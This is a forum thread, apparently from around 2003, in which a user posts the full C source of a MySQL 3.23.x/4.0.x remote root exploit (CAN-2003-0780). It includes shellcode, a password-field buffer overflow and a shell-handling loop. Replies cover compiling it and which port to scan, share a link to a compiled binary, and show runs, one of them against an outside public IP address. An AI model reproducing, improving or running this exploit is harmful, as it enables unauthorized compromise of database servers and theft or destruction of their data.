[woutiir]

Most ppl will be damn happy to see this one..

It says PoC (proof of concept) but if you ask me their shellcode is right and it should just work, and it's PoC because it's a proof of that it's working. so he kinda mixed up some term, anyhow, enjoy it!

I will :D

Mysql 3.23.x/4.0.x Remote Root Exploit
 

/* Mysql 3.23.x/4.0.x remote exploit
* proof of concept
* using jmp *eax
* bkbll (bkbll cnhonker.net,bkbll tom.com) 2003/09/12
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
* DO NOT DISTRUBITED IT
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <netdb.h>
#include <mysql/mysql.h>

#define PAD 19*4*2
#define JMPADDR 0x42125b2b
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
#define BUF 1024

MYSQL *conn;
char NOP[]="90";
/*
char shellcode[]=
"31c031db31c9b002"
"cd8085c0751b4b31"
"d2b007cd8031c0b0"
"40cd8089c331c9b1"
"09b025cd80b001cd"
"80b017cd8031c050"
"405089e331c9b0a2"
"cd80b1e089c883e8"
"0af7d04089c731c0"
"404c89e250505257"
"518d4c240431dbb3"
"0ab066cd805983f8"
"017505803a497409"
"e2d231c04089c3cd"
"8089fbb103b03f49"
"cd8041e2f851686e"
"2f7368682f2f6269"
"89e351682d696c70"
"89e251525389e131"
"d231c0b00bcd8090";
*/
char shellcode[]=
"db31c03102b0c931"
"c08580cd314b1b74"
"cd07b0d2b0c03180"
"8980cd40b1c931c3"
"cd25b009cd01b080"
"cd17b08050c03180"
"e3895040a2b0c931"
"e0b180cde883c889"
"40d0f70ac031c789"
"e2894c4057525050"
"244c8d51b3db3104"
"cd66b00af8835980"
"800575010974493a"
"c031d2e2cdc38940"
"b1fb8980493fb003"
"e24180cd6e6851f8"
"6868732f69622f2f"
"6851e389706c692d"
"5251e28931e18953"
"b0c031d29080cd0b";

int type=1;
struct
{
 char *os;
 u_long ret;
} targets[] =
     {
          { "glibc-2.2.93-5", 0x42125b2b },
    },v;

void usage(char *);
void sqlerror(char *);
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);

main(int argc,char **argv)
{
    MYSQL_RES *result;
    MYSQL_ROW row;
    char jmpaddress[8];
    char buffer[BUF],muser[20],buf2[800];
    my_ulonglong rslines;
    struct sockaddr_in clisocket;
    int i=0,j,clifd,count,a;
    char data1,c;
    fd_set fds;
    char *server=NULL,*rootpass=NULL;

    if(argc<3) usage(argv[0]);
    while((c = getopt(argc, argv, "d:t:p:"))!= EOF)
      {
            switch (c)
            {
              case 'd':
                  server=optarg;
                  break;
              case 't':
                  type = atoi(optarg);
                  if((type > sizeof(targets)/sizeof(v)) || (type < 1))
                       usage(argv[0]);
                  break;
             case 'p':
                  rootpass=optarg;
                   break;
             default:
                  usage(argv[0]);
                  return 1;
              }
          }
          if(server==NULL || rootpass==NULL)
              usage(argv[0]);
    memset(muser,0,20);
    memset(buf2,0,800);
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("[+] Connecting to mysql server %s:%d....",server,PORT);
    fflush(stdout);
    conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);
    if(conn==NULL) exit(0);
    printf("ok\n");
    printf("[+] ALTER user column...");
    fflush(stdout);
    if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)
        sqlerror("ALTER user table failed");
    //select
    printf("ok\n");
    printf("[+] Select a valid user...");
    fflush(stdout);
    if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0) 
        sqlerror("select user from table failed");
    printf("ok\n");
    result=mysql_store_result(conn);
    if(result==NULL)
        sqlerror("store result error");
    rslines=mysql_num_rows(result);
    if(rslines==0)
        sqlerror("store result error");
    row=mysql_fetch_row(result);
    snprintf(muser,19,"%s",row[0]);
    printf("[+] Found a user:%s\n",muser);
    memset(buffer,0,BUF);
    i=sprintf(buffer,"update user set password='");
    sprintf(jmpaddress,"%x",JMPADDR);
    jmpaddress[8]=0;
    for(j=0;j<PAD-4;j+=2)
    {
        memcpy(buf2+j,NOP,2);
    }
    memcpy(buf2+j,"06eb",4);
    memcpy(buf2+PAD,jmpaddress,8);
    memcpy(buf2+PAD+8,shellcode,strlen(shellcode));
    j=strlen(buf2);
    if(j%8)
    {
        j=j/8+1;
        count=j*8-strlen(buf2);
        memset(buf2+strlen(buf2),'A',count);
    }
    printf("[+] Password length:%d\n",strlen(buf2));
    memcpy(buffer+i,buf2,strlen(buf2));
    i+=strlen(buf2);
    i+=sprintf(buffer+i,"' where user='%s'",muser);
    mysql_free_result(result);
    printf("[+] Modified password...");
    fflush(stdout);    
    //get result
    //write(2,buffer,i);
    if(mysql_real_query(conn,buffer,i)!=0) 
        sqlerror("Modified password error");
    //here I'll find client socket fd
    printf("ok\n");
    printf("[+] Finding client socket......");
    j=sizeof(clisocket);
    for(clifd=3;clifd<256;clifd++)
    {
        if(getpeername(clifd,(struct sockaddr *)&clisocket,&j)==-1) continue;
        if(clisocket.sin_port==htons(PORT)) break;
    }
    if(clifd==256)
    {
        printf("FAILED\n[-] Cannot find client socket\n");
        mysql_close(conn);
        exit(0);
    }
    data1='I';
    printf("ok\n");
    printf("[+] socketfd:%d\n",clifd);
    //let server overflow
    printf("[+] Overflow server....");
    fflush(stdout);
    send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);
    //if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL))!=0) 
    //    sqlerror("Flush error");
    printf("ok\n");
      printf("[+] sending OOB.......");
      fflush(stdout);
      if(send(clifd,&data1,1,MSG_OOB)<1)
      {
          perror("error");
          mysql_close(conn);
          exit(0);
      }
    printf("ok\r\n");
    printf("[+] Waiting a shell.....");
    fflush(stdout);
    j=0;
    memset(buffer,0,BUF);
      while(1)
    {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(clifd, &fds);
        
        if (select(clifd+1, &fds, NULL, NULL, NULL) < 0) 
        {
            if (errno == EINTR) continue;
            break;
        }
        if (FD_ISSET(0, &fds)) 
        {
            count = read(0, buffer, BUF);
            if (count <= 0) break;
            if (write(clifd, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        if (FD_ISSET(clifd, &fds)) 
        {
            count = read(clifd, buffer, BUF);
            if (count <= 0) break;
            if(j==0) printf("Ok\n");
            j=1;
            if (write(1, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        
    }    
}

void usage(char *s)
{
    int a;
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("Usage:%s -d <host> -p <root_pass> -t <type>\n",s);
    printf("      -d target host ip/name\n");
    printf("      -p 'root' user paasword\n");
    printf("      -t  type [default:%d]\n",type);
    printf("      ------------------------------\n");
    for(a = 0; a < sizeof(targets)/sizeof(v); a++)
        printf("         %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);   
    printf("\n");           
    exit(0);
}
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
{
    MYSQL *connect;
    connect=mysql_init(NULL);
    if(connect==NULL)
    {
        printf("FAILED\n[-] init mysql failed:%s\n",mysql_error(connect));
        return NULL;
    }
    if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)
    {
           printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
           return NULL;
       }
       return connect;

}
void sqlerror(char *s)
{
    fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
    mysql_close(conn);
    exit(0);
}

/* woutiir 0wnZ YoU */

Greetings,
woutiir

[clip]

printf(" -p 'root' user paasword\n");

you need a valid root password. no?

[woutiir]

nope you can specify the root passwd that you like.
Tho i found another problem the /mysql/mysql.h aint included, gonna install mysql now and see if it work .:\

[clip]

emerge mysql ;)

[Buster]

i tried to compile the exploit, but there were too many errors. i installed mysql but it doesn't work.

[Yosam]

where is the header file? ;)

btw, is there a certain port that i should scan for it?

[clip]

install mysql and run


gcc -o msql msql.c -L/usr/local/mysql/lib -lmysqlclient -lz

the exploit dosent work though.

[Gandulf]

HI,

Mysql Port is 3306, but i think you must have a valid root pass.

Without a pass you get this:

oot@hell:/home/daafa> ./mysql -d 127.0.0.1 -p xUPiGiK
@-------------------------------------------------@
# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 127.0.0.1:3306....FAILED
[-] Error: Can't connect to MySQL server on '127.0.0.1' (111)

with the pass you become this message:

root@hell:/home/daafa> ./mysql -d 127.0.0.1 -p xUPiGiKi
@-------------------------------------------------@
# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 127.0.0.1:3306....ok
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:admin
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......error: Connection reset by peer

so i become no shell or somthing other, but now the mysql ist broken.
I must reinstall the mysql server.

Greets
Gandulf

[Yosam]

prehaps you can upload your compiled *.exe file please?

thanks.

[clip]

Yup, you need a valid account so it's quite useless.

Quote

CVE Ids : CAN-2003-0780

MySQL, a popular relational database system, contains a buffer overflow condition which could be exploited by a user who has permission to execute "ALTER TABLE" commands on the tables in the "mysql" database. If successfully exploited, this vulnerability could allow the attacker to execute arbitrary code with the privileges of the mysqld process (by default, user "mysql"). Since the "mysql" database is used for MySQL's internal record keeping, by default the mysql administrator "root" is the only user with permission to alter its tables.

[clip]

linux x86 binary:

http://203.177.80.47/images/msql.rar

[Buster]

linux:/home/Buster # ./msql -d 195.224.17.200 -p "" -t 1
@-------------------------------------------------@
# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 195.224.17.200:3306....ok
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......ok
[+] Waiting a shell.....linux:/home/Buster

I think this is a fake. The server crashed and i got my shell (i hadn't exploitet my server).